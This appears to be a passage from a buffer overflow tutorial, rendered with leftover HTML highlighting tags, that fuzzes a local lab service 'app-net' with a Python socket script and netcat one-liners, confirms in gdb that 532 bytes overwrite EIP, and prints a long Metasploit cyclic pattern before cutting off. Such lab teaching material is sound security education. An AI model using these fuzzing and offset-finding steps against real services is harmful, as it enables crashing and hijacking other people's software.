class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="k"for/span span class="n"i/span span class="ow"in/span span class="nb"range/spanspan class="p"(/spanspan class="mi"1/spanspan class="p",/spanspan class="mi"5001/spanspan class="p"):/span span class="c1"# loop through 1 to 5001/span/span span class="code-line" span class="c1"# and use i as the incrementor/span/span span class="code-line"/span span class="code-line" span class="c1"# create a TCP socket (AF_INET = IP and SOCK_STREAM = TCP)/span/span span class="code-line" span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# use that socket and connect to 127.0.0.1:9999/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line" span class="c1"# send quot;Aquot; i number of times over the connection/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# store the reply in a variable called reply/span/span span class="code-line" span class="n"reply/span span class="o"=/span span class="n"s/spanspan class="o"./spanspan class="n"recv/spanspan class="p"(/spanspan class="mi"2048/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# close the socket/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/span span class="code-line" span class="c1"# check the output is what we expect/span/span span class="code-line" span class="k"if/span span class="n"reply/span span class="o"!=/span span class="s2"quot;Wrong password: quot;/span span class="o"+/span span class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p":/span/span span class="code-line"/span span class="code-line" span class="c1"# and if not break out of the loop/span/span span class="code-line" span class="k"break/span/span span class="code-line"/span span class="code-line"span class="c1"# print what number we got to/span/span span class="code-line"span class="nb"print/span span class="n"i/span/span span class="code-line"/code/pre/div /td/tr/table pRun the script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython app-net-fuzz.py/span span class="code-line"span class="go"528/span/span span class="code-line"/code/pre/div /td/tr/table pNow we have to verify how far it is until we overwrite EIP:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app-net/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 528#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 530#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x000a4141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table pSo the next 4 bytes after the first 528 bytes that we send overwrite EIP, lets use the second method to verify this./p pThe second method involves using a couple of tools that come with a href="https://en.wikipedia.org/wiki/Metasploit_Project" target="_blank"metasploit/a (codepattern_create.rb/code and codepattern_offset.rb/code). First we create a pattern of 5000 bytes using codepattern_create.rb/code, send this and use codepattern_offset.rb/code to find out where we overwrote EIP:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app-net/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanspan class="nb"cd/span /usr/share/metasploit-framework/tools//span span class="code-line"span class="gp"[email protected]:/usr/share/metasploit-framework/tools$ /span./pattern_create.rb span class="m"5000/span/span span class="code-line"span class="go"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk/span/span span class="code-line"span class="gp"[email protected]:/usr/share/metasploit-framework/tools$ /spanspan class="nb"echo/span -n span class="s2"quot;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4E